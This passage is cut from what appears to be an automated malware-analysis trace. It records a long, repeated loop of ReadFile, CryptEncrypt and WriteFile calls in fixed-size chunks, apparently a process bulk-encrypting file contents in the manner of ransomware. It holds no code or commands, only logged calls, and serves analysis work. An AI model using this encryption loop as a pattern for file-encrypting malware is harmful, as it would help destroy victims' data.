lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.156] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.156] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.156] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.156] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.156] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.156] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.156] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.157] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.157] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.157] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.157] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.157] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.157] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.158] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.158] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.158] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.158] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.158] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.158] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.159] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.159] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.159] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.159] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.159] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.159] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.159] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.159] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.159] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.159] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.159] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.159] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.159] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.159] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.160] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.160] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.160] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.160] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.160] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.160] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.161] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.161] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.161] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.161] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.161] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.161] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.162] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.162] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.162] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.162] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.162] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.162] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.163] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.163] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.163] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.163] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.164] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.164] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.164] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.164] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.164] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.164] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, 